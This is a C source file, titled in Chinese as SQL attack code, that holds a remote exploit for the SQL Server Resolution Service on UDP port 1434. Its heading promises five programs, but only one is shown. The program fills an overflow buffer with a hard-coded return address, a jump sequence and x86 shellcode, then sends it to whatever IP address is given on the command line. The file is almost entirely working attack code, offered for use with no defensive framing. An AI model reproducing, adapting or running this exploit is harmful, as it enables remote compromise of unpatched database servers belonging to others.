sql-攻击代码.c

五个C++程序源代码

#include <stdio.h> 
#include <winsock2.h> 
#pragma comment (lib,"Ws2_32") 
	
	unsigned int resolve(char *name) 
	{ 
	    	struct hostent *he; 
	    	unsigned int ip; 
	
	    	{ 
	        	if((he=gethostbyname(name))==0) 
	            	return 0; 
	    	if((ip=inet_addr(name))==(-1)) 
	        	memcpy(&ip,he->h_addr,4); 
	    	} 
	    	return ip; 
	
	} 
	int main(int argc,char *argv[]) 
	{ 
	    	int s; 
	    	char buf2[350]; 
	    	struct sockaddr_in target; 
	    	int EIP = 0x78024e02;
	    	int EAX = 0x42d01e40;
	    	unsigned char forwardjump[]="\x0eb\x0a\x0cc\x0cc\x0cc\x0cc\x0cc\x0cc";
	
	    	WSADATA WSAData; 
	
	BYTE shellcode[] = ""
	"\x8B\xF1\x33\xC0\xC7\x06\x5C\x73\x63\x61\xC7\x46\x04\x6E\x5F\x73"
	"\x71\xC7\x46\x08\x6C\x32\x6B\x5F\xC7\x46\x0C\x62\x6F\x2E\x41\x88"
	"\x46\x0F\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\xB8\x6C\xC2"
	"\x01\x78\xFF\xD0\xB8\xC7\x3E\x01\x78\xFF\xD0";
	
		if (argc!=2)
	    	{
	        	printf("usage: %s ip\n",argv[0]);
	        	return -1;
	    	}
	
	    	if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) 
	    	{ 
	           printf("WSAStartup failed.\n"); 
	           WSACleanup(); 
	           exit(1); 
	    	} 
	
	    	s = socket(AF_INET,SOCK_DGRAM,0);
	    	if(s<0) 
	        	return -1; 
	
	    	memset((char *)&target,0,sizeof(target)); 
	
	    	target.sin_family = AF_INET; 
	    	target.sin_addr.s_addr = resolve(argv[1]); 
	    	if(target.sin_addr.s_addr==0) 
	    	{ 
	        	closesocket(s); 
	        	return -2; 
	    	} 
	    	target.sin_port = htons(1434); 
	
		memset(buf2,0xcc,sizeof(buf2));
		buf2[0] = 0x04;
	    	*(unsigned int *)&buf2[97] = EIP;
		memcpy(&buf2[101], forwardjump, strlen(forwardjump));
		*(unsigned int *)&buf2[109] = EAX;
		memcpy(&buf2[113], shellcode, strlen(shellcode));  
		buf2[1+96+8+strlen(forwardjump)+strlen(shellcode)]=0;
	    	
	   	if (sendto(s, buf2, strlen(buf2)+1, 0, &target, sizeof(target)) == SOCKET_ERROR)  
	        	printf("Error:  sendto() failed.\n");  
	    	closesocket(s); 
	    	return 0; 
	}